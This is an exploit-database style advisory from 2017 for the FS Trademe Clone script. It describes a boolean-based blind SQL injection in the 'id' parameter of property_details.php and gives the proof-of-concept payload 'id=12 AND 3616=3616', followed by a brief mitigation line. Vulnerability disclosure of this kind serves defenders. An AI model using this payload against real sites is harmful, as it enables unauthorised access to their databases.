vendor:
FS Trademe Clone
by:
8bitsec
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: FS Trademe Clone
Affected Version From: 24 October 17
Affected Version To: 24 October 17
Patch Exists: YES
Related CWE: N/A
CPE: fortunescripts.com/product/trademe-clone/
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017
FS Trademe Clone – ‘id’ SQL Injection
SQL injection on [id] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/property_details.php?id=12 AND 3616=3616 Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=12 AND 3616=3616
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.